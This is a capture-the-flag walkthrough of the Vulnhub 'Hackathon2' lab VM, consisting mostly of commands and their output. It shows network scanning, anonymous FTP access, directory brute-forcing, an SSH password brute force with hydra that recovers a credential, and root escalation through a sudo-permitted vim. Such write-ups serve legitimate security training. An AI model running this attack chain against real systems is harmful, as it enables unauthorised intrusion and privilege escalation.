Vulnhub-Hackathon2

sudo arp-scan 192.168.109.1/24                                             

Interface: eth0, type: EN10MB, MAC: 00:0c:29:d6:59:a7, IPv4: 192.168.109.140
WARNING: host part of 192.168.109.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.109.1   00:50:56:c0:00:08       VMware, Inc.
192.168.109.2   00:50:56:f0:a1:15       VMware, Inc.
192.168.109.144 00:0c:29:28:21:61       VMware, Inc.
192.168.109.254 00:50:56:f2:84:70       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.934 seconds (132.37 hosts/sec). 4 responded

nmap -sC -sV -p- 192.168.109.144 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-23 23:33 EDT
Nmap scan report for 192.168.109.144
Host is up (0.00020s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
|_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.109.140
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_*/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: hackathon2
7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 70:4a:a9:69:c2:d1:68:23:86:bd:85:83:31:ca:80:0c (RSA)
|   256 a6:9e:a4:18:ad:a4:2b:7e:ea:f8:5e:63:29:6e:4f:24 (ECDSA)
|_  256 4e:db:a6:d2:eb:b9:53:a5:d7:21:0b:4e:57:a5:f5:c1 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.09 seconds

ftp> open 192.168.109.144
Connected to 192.168.109.144.
220 (vsFTPd 3.0.3)
Name (192.168.109.144:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
226 Directory send OK.
ftp> 

dirb http://192.168.109.144/ word.dir 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 24 01:52:28 2021
URL_BASE: http://192.168.109.144/
WORDLIST_FILES: word.dir

-----------------

GENERATED WORDS: 109                                                           

---- Scanning URL: http://192.168.109.144/ ----
+ http://192.168.109.144/happy (CODE:200|SIZE:110)                                                                               
                                                                                                                                 
-----------------
END_TIME: Sat Jul 24 01:52:28 2021
DOWNLOADED: 109 - FOUND: 1

hydra -l hackathonll -P word.dir -f -t 20 ssh://192.168.109.144 -s 7223 

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-24 00:16:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 110 login tries (l:1/p:110), ~6 tries per task
[DATA] attacking ssh://192.168.109.144:7223/
[7223][ssh] host: 192.168.109.144   login: hackathonll   password: Ti@gO
[STATUS] attack finished for 192.168.109.144 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-24 00:16:58

ssh hackathonll@192.168.109.144 -p 7223                                    

hackathonll@192.168.109.144's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 24 Jul 2021 07:38:22 AM UTC

  System load:  0.01               Processes:              221
  Usage of /:   24.2% of 18.57GB   Users logged in:        0
  Memory usage: 20%                IPv4 address for ens33: 192.168.109.144
  Swap usage:   0%


67 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jul 24 04:18:07 2021 from 192.168.109.140
$ id
uid=1001(hackathonll) gid=1001(hackathonll) groups=1001(hackathonll)
$ 

sudo -l

Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim

sudo vim

root@hackathon:/home/hackathonll# id
uid=0(root) gid=0(root) groups=0(root)
root@hackathon:/home/hackathonll# ls
root@hackathon:/home/hackathonll# cd
root@hackathon:~# ls
flag2.txt  snap
root@hackathon:~# cat flag2.txt 
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}
root@hackathon:~#